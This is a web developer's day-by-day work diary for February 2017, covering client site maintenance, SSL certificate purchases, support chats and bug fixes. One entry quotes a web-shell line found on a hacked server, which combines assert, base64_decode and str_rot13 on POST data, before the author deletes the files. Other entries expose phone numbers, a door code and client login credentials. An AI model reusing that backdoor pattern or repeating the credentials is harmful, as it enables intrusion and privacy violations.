Websites Calendar 2017

Job Times


February 2017

1 Wedadminstretch and tone no email queried

3pm chris hidson birchal blackburn will be the solicitors piggotts refused
 klscreate a copy of the live site on HI as 3.0

split the modules
init.find-a-solicitor.php into 2 one admin and the other public
find-a-solicitor.tpl into 2 as well. This makes it easier to see the problems


2 Thuklsproblem for the lawyer not being displayed was because his firm had not been set to rochester
check for others in similar position

select id, name, website from firms f left join locality-firm l on l.firm_id =id
order by name

The main problem with the search and map discrepancies was because google api was loaded more than once. Removed the top references and added the api to the end of the script. Now the satellite, enlarging, contracting moving and the markers with descriptions work.

Test and re load to live site 4.0

smarty can also use includes {include}
 adminpaid 3772 turkish lira for maintenance

841.60 +9.50 =851.10
tried to change contact details - cannot change organisation. Sent a ticket

3 Friadminspinning no email queried0.000.00
HI have updated scottishgrocer and now projectplant

4 Satadmintbc no email queried
10 CASTLE STREET JAMIE check no dogs allowed and if it is social housing


5 Sunadminill0.000.00

6 Monadminabs - cancelled
invoices out 2.0
drop out of castle street due to social housing
 headleyrang webfusion re account XC0001825
This account has been closed. He will get the invoices removed regarding myheadway and headstart

To get the headstart ssl need to put in a ticket or email to or ring 0345 450 2580
these are all for support

170125-000698 - ticket cancellation of these services
01-INVS-00547441 service 01-SI-00058255
domain headstart re- activate to heart account

7 Tueadmindentist karen leadbetter 5:40

started copying over the ksfa and headley site to the maxtor

need to get jazz copied over tomorrow
emailed jazz
 kylcopied over home page pics for February
spoke to Diane and Ken re headleys
Ken fine with me changing the domain from headley to me
 headleyrequest to HI to change contact details
as I pay the account bill

8 Wedadminstretch and tone
cancel josh's class at 6:15
not going swimming. feel a lot better but still have a cold

 headleychanged contact at the headley account to me with the email

Need to cleanup account.

copied over accounts on headley servage to j drive as a precaution 2.0

 klsproblem with pdf uploads - okay
discussed with Roger .5

moved to servage prenticechallis
copied over across to dell and then to on pc servage 1.0
 pastoraladded latest spreadsheet .5
investigated fileserver for attempted hacking - 2 files in the image area loaded on 7/1/2017 thumb_j2.php.
code @assert(@base64_decode(@str_rot13($_POST[data])
i have decoded the above as use of hex and ascii ming led

str_rot13 performs ROT13 encoding on the str argument and returns resulting string
base64_decode decodes a base 64 encoded data

2nd file thumb_j2.php5.jpg looked like html color chart
have destroyed both files. Not sure how the first .php. got into the directory as .php excluded but this has an extra dot.

need to know if ifarrar is still getting emails from the site. hoping their destruction stops this. the db looks fine

9 Thuadminsammy arriving around 12pm
need to remove to
 kylqueries re problem ref match card and amendment
sent email to Chris Myatt with amendment details
 headleyheadley paid 168.00 try and get HI to setup the SSL 0.000.50
 klsSearchReplaceWord created on
Remove all references to

10 Friadminspin
window cleaner
 kylproblem with paul agboola - looks like refs trying to add matchcards from last year. 0.000.50 removal of headley 1.0
 headleyheart internet will not deal with SSL when the domain is not held with them. I have attempted to request one from 123-reg (my own account)

just purchased 2 years at same price

You are now talking with Iosif Cristian from support

Iosif Cristian: (16:11): Good afternoon, I'm Iosif from 123-reg support team and I will assist you today.

Iosif Cristian: (16:11): How may I help you?

Jennifer P.: (16:12): Hi I have put in a ticket re a purchase of a SSL. I just need to know if I purchase a SSL for 2 years that 123reg will deal with it. It is for a website held with Virgin. If I get the CSR will this be okay. Webfusion did this for the last 5 years but the account with them is now closed

Jennifer P.: (16:13): I have tried to purchase using my debit card but this doesn't seem to be accepted by 123reg. I purchased a domain a few days ago with 123reg and the only way to purchase was by using paypal so will attempt to do this again

Iosif Cristian: (16:14): We will assist you with the SSL, but we can't install it for you, if this is on an external server.

Jennifer P.: (16:15): that is okay as company's tech support will do the installation

Iosif Cristian: (16:15): Oh, that's great.

Jennifer P.: (16:16): So do I just purchase the organisation ssl first and then 123reg will assist once paid. Thanks

Jennifer P.: (16:17): the ssl cert is required as is the landing area for print clients to send their pdfs for print processing by fuji

Iosif Cristian: (16:17): Of course.

Jennifer P.: (16:18): right. I will pay by paypal and talk later thanks

Iosif Cristian: (16:19): You are most welcome. Have a great day ahead and thank you for using our Live Chat :)

Spoke to Will

Need info on Monday re csr. Forgot will be out
Send email to mike.

11 Satadmintbc
need to make negresse and oranges and caramel

12 SunadminJohn and Lucy Nightingale invite you to lunch and to celebrate Emma�s 60th birthday

at Wormshill Court, Near Sittingbourne, ME9 0TS

at 12.30pm on Sunday 12 February 2017


Text to 07795 227611 or

13 Monadminabs - need to cancel
will take sammy and stay at annes from 10:30 till 8pm. Need to take some food
key for door 5360

14 ssl

filling it in on je 123reg account.
spoke to Mike 07711591100
 CruiseFerryI have added the gif but you didn't say where the link was to go to. I have put it as http://www.isuzutru Please let me know what the correct one should be. You will see it is sharing the bottom left rotating skyscraper with City irrigation 0.000.50

15 Wedadminstretch and tone

mike oyston mobile 07711591100
 kylproblem on postponed games - only cup games. Logic must be changed on the match link to new match number 0.000.75 ssl 0.003.50
 klswork on the handshake to see if sub valid0.003.00

16 ThuheadleyJeramie MayugaSupport Agent

Jeramie Mayuga12:49 pm Hello, may I answer any questions for you today?

12:50 pm Hi Jennifer

12:51 pm This order ID CE201702166474 is under vetting process. it ill take 2-3 days before to issue the certificate.

12:55 pm You can also send them an email for more details of your certificate: here is the email,

Client Digital Certificate Process:

Identify which Client Digital Certificate best suits your requirements.
Create a GlobalSign Certificate Center (GCC) account and complete the application to order and purchase the certificate OR if you already have a GCC account place the new order in your account.
Receive the approval email and accept the application.
Wait for the vetting process to be completed by GlobalSign (varies depending on the type of certificate you purchased).
Pick up your Client Digital Certificate using your pickup password. Remember this cannot be reset if forgotten so make sure to take note of it during the application process.
Download the Client Digital Certificate. Instructions to do this can be searched for in the search bar above.
Install the Client Digital Certificate by following the instructions specific to your operating system, browser, and/or email client. Specific instructions can be searched for in the search bar above.
Your certificate is now ready for use.

ticket to 123 reg and contacted GlobalSign

got to wait a few days for vetting
 klswork on the handshake to see if sub valid0.002.50
 jazz jaltered core-header on jazzjournal to force the https:// to remain on all actions via subs2mags
The black padlock with line through otherwise
 CruiseFerryThis is a new feature that is available starting in Firefox version 51.

Firefox will display a lock icon with red strike-through red strikethrough icon in the address bar when a login page you�re viewing does not have a secure connection. This is to inform you that if you enter your password it could be stolen by eavesdroppers and attackers.

problem read more is being regarded as login
 TrainingSince Firefox 46, Firefox Nightly and Developer Edition have been showing a broken padlock icon on the location bar when the current page has while the connection is not secure. Firefox 50 expanded this insecure password input warning to early Beta versions. Firefox 51 makes it enabled by default on all channels including the Release version.

Thought the indicator is not so prominent at this moment, there will be more warnings including in-context UI changes as part of the ongoing insecure HTTP deprecation. Web developers are strongly encouraged to move any sign-in form to an HTTPS page or ideally make the page itself HTTPS in order to protect customers.

This change will be made in line with Google Chrome 56 that makes a similar change also in January 2017.

17 Friadminspin0.000.00
 klswork on the handshake to see if sub valid
jon email re sub system
I have suggested purchase of SSL cert
 TrainingThe main problem with firefox mozilla is the twitter timeline which is causing a conflict together with the read more. Remove the twitter and all is fine

kentlawsociety is not showing the problem
 CruiseFerryproblem with template.php gone missing blocked as this seemed to be making a lot of attempts

18 Satadmintbc

tried to sort out outlook for
in conversation mode unfortunately you cannot change this when outlook is used via the web as the tab file, display etc is only when outlook installed on your pc
 klsNeed to create quote/invoice re SSL0.000.25

19 Sunkylchange the images on the homepage0.000.00

20 Monadminabs0.000.00
 CruiseFerryfeb issue loaded0.000.50

21 TueCruiseFerryErrors [Tue Feb 21 08:46:14 2017] [error] [client]
AH01215: PHP Warning: simplexml_load_string(): Entity: line 77: parser error :
Premature end of data in tag head line 3 in
/home/sites/ ublic_html/wp-content/themes/cnews/update-theme.php on line 69:
/home/sites/ /public_html/wp-admin/index.php [Tue Feb 21 08:46:14 2017] [error] [client]
AH01215: PHP Warning: simplexml_load_string(): Entity: line 77: parser error :
Premature end of data in tag html
line 2 in /home/sites/landscapermagazine on line 69:
/home/sites/ /public_html/wp-admin/index.php

reinstated as I think this must be david curtis's ip address
Landscape paid Nov/Dec bill 50.00 50.00

problem with null was from SAM ads where I had removed the default and it had NULL in the text

General cleanup
 kylChris Myatt found a bug in refmcrepz. Fixed0.000.75
 klslogin system0.000.00

22 Wedadminstretch and tone0.000.00
 CruiseFerryadded another ad0.000.25
 klscompletion of login system 3.5
checked out portal
sent email to Roger and Jon re the switch over for portal as will stop in 2 days
document for login system 1.0

created thunderbird on vista pc. Setup and downloaded all the directories. I then setup on thunderbird and copied the across on to new portal. 1.5
0.006.00 stopped0.000.00

23 Thuklsadded functionality to update the backend to make the tabs private or public 1.0

Amended and sent documentation .5

Changes for membership functionality

/ajax/update.php=>2017-02-23 10:37:21

/phpincludes/body_topStr.php=>2017-02-03 01:02:56
/phpincludes/functions.php=>2017-02-15 11 :22:31
/phpincludes/html_footer.php=>2017-02-03 12 :41:06
/phpincludes/html_headerStr.php=>2017-02-03 12:34:23

/images/kls-logo.png=>2017-02-03 12:52: 39

/clientvalid.php=>2017-02-20 05:05:14
/.htac cess=>2017-02-22 12:42:56
/validate_pwdGen.php=>2017-02-22 01:12:43
/clientpublic.php=>2017-02-16 11:20:28
/ .index.php=>2017-01-30 12:09:02

/functions/init. find-a-solicitor.php=>2017-01-31 05:36:05
/functio ns/pre.find-a-solicitor.php=>2017-01-31 04:50:33
/ functions/init.logout.php=>2017-01-29 10:40:35
/fu nctions/init.login.php=>2017-01-29 08:29:59
/funct ions/pre.login.php=>2017-01-30 12:23:25
/functions /pre.membership-area.php=>2017-01-27 12:39:50

/support/templates/.index.tpl=>2017-02-23 10:49:12

/support/templates/find-a-solicitor.tpl=>2017-01-31 11:57:03
/support/templates/login.tpl=>2017-02-21 03:51:56
/support/templates/validate_pwdGen.php=>2017-01-27 03:29:55
/support/templates/find-a-solicitor.tplnew=>2017-01-31 10:24:51

/resetpwd/resetpwform.php=>2017-02-21 0 4:42:49
/resetpwd/resetpwd.php=>2017-02-22 01:28:4 0
/resetpwd/curmember.php=>2017-02-20 11:29:53
/r esetpwd/resetpwdk.php=>2017-02-16 04:04:51
/resetp wd/html_footerStr.php=>2017-02-15 02:27:47

copied all the changes to live website and tested functionality 3.5
 headleynew password for

 adminspoke to chris croal re headleys. She has broken a bone in her ankle and has dvt from falling on a pavement
rang Aegon re transferring pension to Mercury
 Trainingpassword pword website-design@hot web2deshead heart 0.000.00

24 Friadminspin
 klsproblem with phpmyadmin for kls as getting a site blocked from norton - put in a ticket to HI to see how to resolve
problem is shared ip address because another customer spamming. use ipad as this is n't restricted by norton. 1.0

spoke to roger re klsmember portal
user kls pword rcrutt and .5

created ssl quote and sent .5

example of SPF record for Heart
E-Mail Delivery to BT and Yahoo

Identified - We are seeing that a number of rejections to BT and Yahoo are being caused by badly formed SPF records. If you are having issues sending to addresses with BT and Yahoo from our systems we recommend using the following SPF:-

v=spf1 ex ists:%{i} exists:%{i} -all
 jazz jproblems with news alerts
it has dropped 5 articles

25 Satadmintbc0.000.00
 jazz jchecked this out and yet the alert i am getting shows these articles
amended the homepage to reduce the amount of errors as flash function was conflicting with html type. Put it into a js file cookflash and called this from core-header. This has reduced the number of errors. Errors still remain because of twitter feed and reading flash files.

26 Sunjazz jbacking up jazz to my dell machine
Need to look into updating tinymce
updated fckeditor to hopefully remove problems on the crawl. Probably advisable to update the website to a bootstrap mobile one as it looks like google is getting more problematic
 kylproblem with mysql db really slow. #Put in a ticket but looking at the log files it looks like table.php was the culprit. There was a join with a duplicate field which was causing the rendering to take 32 seconds. Changed the sql and it takes 7 seconds. Hopefully this is now fixed. Looked at the query and cannot add more indices to speed it up.

testsql.php is showing the number of connections for mysql and the table application takes 16 so very close to the 25 allocated.

27 Monadminabs
look at flat in st dunstans for lids 2.00
paid for insurance and dask turkey
 jazz jproblem on news
more investigation as now 2 old ones appearing

looking at amp Accelerated Mobile Pages and bootstrap. Mobile/pc view bs and speeded up with amp by removing redundant code

28 TuepastoralMarch issue. add 2017 for readings/back issues/ etc and move jan 2017 to these 0.001.50
 jazz jload march issue on shop and backcopy on live0.500.00
Goto Admin